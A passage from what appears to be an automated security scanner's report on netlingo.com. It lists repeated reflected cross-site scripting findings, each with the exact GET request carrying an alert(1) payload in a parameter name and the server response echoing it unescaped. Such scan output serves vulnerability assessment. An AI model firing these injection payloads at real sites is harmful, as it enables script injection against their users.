Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/add-edit/editor-guidelines.php?2e7db"-alert(1)-"eeac52a4325=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1268. http://www.netlingo.com/advertise/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45d9e"-alert(1)-"9ac9b45a4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertise/index.php?45d9e"-alert(1)-"9ac9b45a4e8=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/index.php?45d9e"-alert(1)-"9ac9b45a4e8=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1269. http://www.netlingo.com/advertise/licensing.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/licensing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6d4f"-alert(1)-"7a919b369a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertise/licensing.php?e6d4f"-alert(1)-"7a919b369a3=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ww.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/licensing.php?e6d4f"-alert(1)-"7a919b369a3=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1270. http://www.netlingo.com/advertise/payments.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/payments.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c1b"-alert(1)-"e08311d27ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertise/payments.php?24c1b"-alert(1)-"e08311d27ec=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/payments.php?24c1b"-alert(1)-"e08311d27ec=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1271. http://www.netlingo.com/advertise/sponsorships.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/sponsorships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"c40e7e0c170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertise/sponsorships.php?26131"-alert(1)-"c40e7e0c170=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/sponsorships.php?26131"-alert(1)-"c40e7e0c170=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1272. http://www.netlingo.com/by-category/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/by-category/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 587c9"-alert(1)-"4286caef72b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /by-category/index.php?587c9"-alert(1)-"4286caef72b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
/www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/by-category/index.php?587c9"-alert(1)-"4286caef72b=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1273. http://www.netlingo.com/change-password.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/change-password.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eccc"><img%20src%3da%20onerror%3dalert(1)>27cd0dda0c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4eccc\"><img src=a onerror=alert(1)>27cd0dda0c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /change-password.php?4eccc"><img%20src%3da%20onerror%3dalert(1)>27cd0dda0c4=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=q604f4d81hs3dk4e8nsfl2k781; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="ref" value="change-password?4eccc\"><img src=a onerror=alert(1)>27cd0dda0c4=1" />
...[SNIP]...

4.1274. http://www.netlingo.com/contact/contact-us.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85cc"-alert(1)-"f9a7aeb155d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /contact/contact-us.php?a85cc"-alert(1)-"f9a7aeb155d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/contact/contact-us.php?a85cc"-alert(1)-"f9a7aeb155d=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1275. http://www.netlingo.com/contact/faq.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22223"-alert(1)-"926fba7f330 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /contact/faq.php?22223"-alert(1)-"926fba7f330=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/contact/faq.php?22223"-alert(1)-"926fba7f330=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1276. http://www.netlingo.com/contact/linktonetlingo.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/linktonetlingo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdcfe"-alert(1)-"3c43700b473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /contact/linktonetlingo.php?fdcfe"-alert(1)-"3c43700b473=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/contact/linktonetlingo.php?fdcfe"-alert(1)-"3c43700b473=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1277. http://www.netlingo.com/decisions.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/decisions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21eb3"><img%20src%3da%20onerror%3dalert(1)>3fdcc674bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21eb3\"><img src=a onerror=alert(1)>3fdcc674bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /decisions.php?21eb3"><img%20src%3da%20onerror%3dalert(1)>3fdcc674bb2=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=nntluhfmkvfus6vk0cg7646qb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="ref" value="decisions?21eb3\"><img src=a onerror=alert(1)>3fdcc674bb2=1" />
...[SNIP]...

4.1278. http://www.netlingo.com/hello/welcome.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/hello/welcome.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8babd"-alert(1)-"0dc6ee6e46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hello/welcome.php?8babd"-alert(1)-"0dc6ee6e46a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
tp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/hello/welcome.php?8babd"-alert(1)-"0dc6ee6e46a=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1279. http://www.netlingo.com/iphone [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82dd9"-alert(1)-"0fc7f046bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /iphone?82dd9"-alert(1)-"0fc7f046bae=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...
                           tb_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/iphone/?82dd9"-alert(1)-"0fc7f046bae=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1280. http://www.netlingo.com/iphone/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e3e8"-alert(1)-"71b86919983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iphone/?4e3e8"-alert(1)-"71b86919983=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...
                           tb_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/iphone/?4e3e8"-alert(1)-"71b86919983=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1281. http://www.netlingo.com/iphone/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9cc3"-alert(1)-"7db72ba4b6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iphone/index.php?a9cc3"-alert(1)-"7db72ba4b6a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...
_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/iphone/index.php?a9cc3"-alert(1)-"7db72ba4b6a=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1282. http://www.netlingo.com/legal/copyright.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/legal/copyright.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42784"-alert(1)-"9e71023a44f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /legal/copyright.php?42784"-alert(1)-"9e71023a44f=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 55220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/legal/copyright.php?42784"-alert(1)-"9e71023a44f=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1283. http://www.netlingo.com/more/adsizes.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/more/adsizes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38385"-alert(1)-"5142c59f27b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /more/adsizes.php?38385"-alert(1)-"5142c59f27b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
...[SNIP]...
_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/more/adsizes.php?38385"-alert(1)-"5142c59f27b=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1284. http://www.netlingo.com/press/about-netlingo.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/about-netlingo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39c6c"-alert(1)-"4c301758d1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/about-netlingo.php?39c6c"-alert(1)-"4c301758d1d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 74664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
w.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/about-netlingo.php?39c6c"-alert(1)-"4c301758d1d=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1285. http://www.netlingo.com/press/all-press-clippings.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/all-press-clippings.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88732"-alert(1)-"9b04fa3131a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/all-press-clippings.php?88732"-alert(1)-"9b04fa3131a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 82372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
lingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
